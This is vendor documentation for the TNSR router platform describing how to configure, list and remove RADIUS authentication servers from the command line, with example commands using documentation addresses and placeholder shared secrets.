RADIUS User Authentication¶
TNSR supports authenticating users using a Remote Authentication Dial-In User Service (RADIUS) server. Though RADIUS was originally designed for dial-up style user authentication, it can be found in numerous authentication roles on modern networks thanks to various vendor additions to the protocol over the years. Organizations commonly use RADIUS servers for centralized authentication as it is widely supported for authentication in protocols such as 802.11x, WPA2, IPsec, and many others.
Danger
Communication between a RADIUS server and a host authenticating against the RADIUS sever, such as TNSR, should be private. In other words, this communication should take place over a VPN, a directly connected secure network, or similar method of secure communication. The RADIUS protocol itself is not encrypted and much of the protocol is sent in the clear which could expose potentially sensitive user information.
Adding a RADIUS Server¶
To define a RADIUS server, start in config
mode and use the radius
command to enter config-radius
mode:
tnsr(config)# radius
tnsr(config-radius)#
Now define one or more RADIUS servers using the server
command:
tnsr(config-radius)# server name <name> host <address> [port <auth-port>] secret <secret>
[timeout <timeout:3-60>] [source-address <ip-addr>]
The server
command accepts the following parameters:
name <name>
The name of the RADIUS server, such as
primary
host <address>
The IP address or FQDN of the server, such as
radius.example.com
port <port>
Optional custom authentication port. When not defined, TNSR assumes the default port which is
1812
.secret <secret>
The shared secret between this host and the RADIUS server. Note that this must use printable ASCII characters and cannot contain spaces or quotes.
timeout <timeout>
Optional duration, in seconds, after which a query will time out. Value can be between
3-60
seconds.source-address <ip-addr>
Optional IP address from which TNSR will use as the source address when communicating with this RADIUS server.
The server
command can be repeated with additional servers for redundancy.
Note
This only defines the RADIUS server. TNSR will not use the server unless it is added to an authentication server group. That group must then be configured for use elsewhere, such as for system user authentication.
Example¶
This example adds two RADIUS servers named primary
and secondary
:
tnsr(config-radius)# server name primary host 198.51.100.3 secret abcd1234
timeout 30 source-address 198.51.100.30
tnsr(config-radius)# server name secondary host 198.51.100.7 secret efgh5678
Viewing RADIUS Servers¶
tnsr(config)# show radius servers
Name Host Secret Timeout Source-Address
primary 198.51.100.3 "abcd1234" 30 198.51.100.30
secondary 198.51.100.7 "efgh5678"
Removing a RADIUS Server¶
To remove a RADIUS server start in config-radius
mode and negate its entry
with the no
form of the server
command along with the name of the entry:
tnsr(config-radius)# no server name <name>
For example:
tnsr(config-radius)# no server name secondary